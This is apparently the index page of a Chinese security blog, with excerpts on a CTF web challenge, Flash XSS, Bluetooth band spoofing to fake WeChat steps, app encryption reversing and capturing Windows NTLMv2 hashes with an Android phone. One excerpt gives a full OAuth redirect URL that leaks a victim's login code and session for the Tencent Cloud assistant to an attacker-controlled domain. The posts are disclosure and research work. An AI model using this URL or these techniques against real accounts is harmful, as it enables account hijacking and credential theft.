基于csv的信息泄露已死

前几天做33c3 ctf中的一道web题vault,遇到了一个比较好玩的前端的思路。

题目是一个用户管理系统,用户可以存储一段secret在数据库里。在联系管理员的页面可以提交一个网址,后台会用phantomjs去访问这个页面。
题目能通过文件包含漏洞拿到源码,并发现有一个管理员的后台页面可以导出用户的信息以及用户存储的secret。题目的目标是拿到管理员的secret。

查看更多

分享到 评论

CodeIgniter 框架阅读

对web框架的安全,我主要关注了以下方面。

  • 开发者如何拿到输入,框架对输入的处理方式
  • 框架如何处理路由
  • 框架如何封装数据库查询
  • 框架对常见操作的处理(session,文件上传)

阅读的思路是先看整体框架的结构,然后通过看官方文档的描述然后找到对应代码阅读。

查看更多

分享到 评论

一个flash xss的利用

从几个星期前就心心念念找一个flash xss来玩,现在flash用的比较少了,自己也懒得每开一个页面就看下有没有swf文件加载进来,于是就简单写了个油猴脚本辅助检测。思路是用的EtherDream大神在微博说的获取所有请求的方法。

查看更多

分享到 评论

利用蓝牙模拟手环伪造微信运动步数

伪造微信运动步数的方法有很多种,可以hook系统提供步数统计的模块,可以伪造GPS,可以找第三方手环的漏洞。
第三方手环走微信iot平台AirSync协议的话可能通信过程启用AES加密,很难对其攻击。于是考虑自己成为一个手环设备生产商并伪造一个运动手环,欺骗微信运动来获取假的运动步数。

查看更多

分享到 评论

蓝牙安全初探

传统蓝牙设备的攻击

蓝牙可能用来传输一些隐私的数据,有时候还需要在两个设备靠近时自动连接,因此引入了配对和绑定。

蓝牙配对模式

Numeric Comparison:配对双方都显示一个6位的数字,由用户来核对数字是否一致,一致即可配对。例如手机之间的配对。
Just Works:用于配对没有显示没有输入的设备,主动发起连接即可配对,用户看不到配对过程。例如连接蓝牙耳机。
Passkey Entry:要求配对目标输入一个在本地设备上显示的6位数字,输入正确即可配对。例如连接蓝牙键盘。
Out of Band:两设备的通过别的途径交换配对信息,例如NFC等。例如一些NFC蓝牙音箱。

查看更多

分享到 评论

搭建简单的Smtp Server

有些时候需要构造一些特殊的邮件地址,而很多邮箱提供商不支持过长或者支持Unicode字符以及有特殊符号的邮箱用户名,这时候就需要自己搭建一个能收取邮件的服务器。市面上有很多大型的搭建邮件服务器的方案,比较复杂,不适合在实际安全检测中使用,于是自己用python脚本实现了一个简单的方案。

查看更多

分享到 评论

腾讯云助手用户帐号劫持

之前在检测腾讯云安全的时候发现了一个oauth的问题,可以导致账号劫持。

问题出现微信腾讯云助手公共号的登陆上。在按照oauth2的标准,redirect_uri需要检查返回地址的host,微信的回调api严格检查了回调地址的host必须为login.cm.qcloud.com。但是,由于这个回调地址又做了一次重定向,这个重定向对host解析有误,导致oauth的code以及用于腾讯云助手的session泄露,让攻击者可以以受害者的身份登录。

攻击测试url:
http://sz.open.weixin.qq.com/connect/oauth2/authorize?appid=wx32d9ff109a3f81eb&redirect_uri=http%3A%2F%2Flogin.cm.qcloud.com%2Fauth%2Fredirect%3FandBind%3D0%26type%3Dweixin%26env%3Dproduct%26r%3Dao8tj%26redirect%3Dhttp%253A%252F%252F5alt.me%[email protected]%252Findex%252Fcvmlist%253Ffrom_wx_login%253D1%26from_wx_oauth%3D1&response_type=code&scope=snsapi_base
发现会携带敏感信息跳转到攻击者受控的域名5alt.me上。

当然由于微信的安全机制,跳转到恶意域名会有一个中转页面,阻止进一步的跳转。但是经过测试,微信并没有拦截新浪云的二级域名。如果攻击者在新浪云注册5alt.sinaapp.com的应用并部署记录代码,即可从referer里获取oauth2返回的code并且从url里获取认证之后的session,从而登陆受害者的腾讯云助手页面。

查看更多

分享到 评论

e乐充app数据包加解密和签名算法

将APP的流量代理出来,抓包发现虽然走的是https,但没有验证证书,burpsuite可以抓到请求的内容,不过请求和响应的内容都加密了。逆向apk,发现用AES加密之后base64编码了一下,签名是拼接参数算md5。简单用python模拟了这个加解密的过程。敏感信息已打码。

分析充值的逻辑,发现手机只是充当了一个代理的作用,将卡片和充值服务器连接起来,与卡交互的流量是加密的。北京的公交卡采用的是NXP MIFARE DESFire的卡,用DES/3DES加密,无法获取到密钥破解卡片。

充值的订单与一卡通的卡号绑定,无法给其他的卡片充值,所以无法通过遍历未完成订单的方法来给自己充值。

尝试在写入一部分数据后移走卡片,此时查询卡片余额已经充值成功,订单仍然处于未完成的状态,但是此时已经无法退款,只能选择继续完成写卡。

到此为止没有其他的利用思路了,只能老老实实花钱充卡了。。

查看更多

分享到 评论

用安卓手机获取锁屏下windows电脑的登陆密码hash

之前看了一篇将USB模拟成网卡然后获取NTLMv2 Hash的文章,原文是通过一个装有Linux系统的USB设备来实现这一攻击。其基本思路是劫持电脑的流量,使其访问SMB协议的地址,那么SMB服务器就能获取到当前的用户名和密码的NTLMv2 Hash。攻击使用了Responser这个工具,来完成流量的劫持和SMB服务器的搭建。

如果没有一个这样的USB设备就不能完成这个攻击了么?答案当然是否定的。安卓手机有一个共享网络的功能,开启这个功能即可把安卓手机模拟成一个网卡设备。在安卓(需要root权限)上chroot运行一个linux系统,执行Responser,这样就能得到同样的攻击效果。

查看更多

分享到 评论

Hello World

换个模板从头再来

分享到 评论